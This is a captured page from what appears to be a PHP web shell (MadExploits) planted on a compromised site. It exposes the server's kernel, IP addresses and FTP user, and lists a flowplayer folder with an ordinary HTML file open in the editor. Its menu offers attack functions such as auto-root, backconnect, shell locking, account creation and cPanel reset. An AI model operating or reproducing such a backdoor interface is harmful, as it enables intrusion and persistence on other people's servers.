Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
flowplayer /
[ HOME SHELL ]
Name
Size
Permission
Action
skin
[ DIR ]
drwxr-xr-x
LICENSE.md
35.46
KB
-rw-r--r--
flowplayer.js
40.76
KB
-rw-r--r--
flowplayer.min.js
20.55
KB
-rw-r--r--
flowplayer.swf
4.05
KB
-rw-r--r--
index.html
971
B
-rw-r--r--
index.php
210
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!doctype html> <head> <!-- player skin --> <link rel="stylesheet" type="text/css" href="skin/minimalist.css" /> <!-- site specific styling --> <style> body { font: 12px "Myriad Pro", "Lucida Grande", sans-serif; text-align: center; padding-top: 5%; } .flowplayer { width: 80%; } </style> <!-- flowplayer depends on jQuery 1.4+ (for now) --> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> <!-- include flowplayer --> <script src="flowplayer.min.js"></script> </head> <body> <!-- the player --> <div class="flowplayer" data-swf="flowplayer.swf" data-ratio="0.417"> <video> <source type="video/webm" src="http://stream.flowplayer.org/bauhaus/624x260.webm"/> <source type="video/mp4" src="http://stream.flowplayer.org/bauhaus/624x260.mp4"/> <source type="video/ogv" src="http://stream.flowplayer.org/bauhaus/624x260.ogv"/> </video> </div> </body>
Close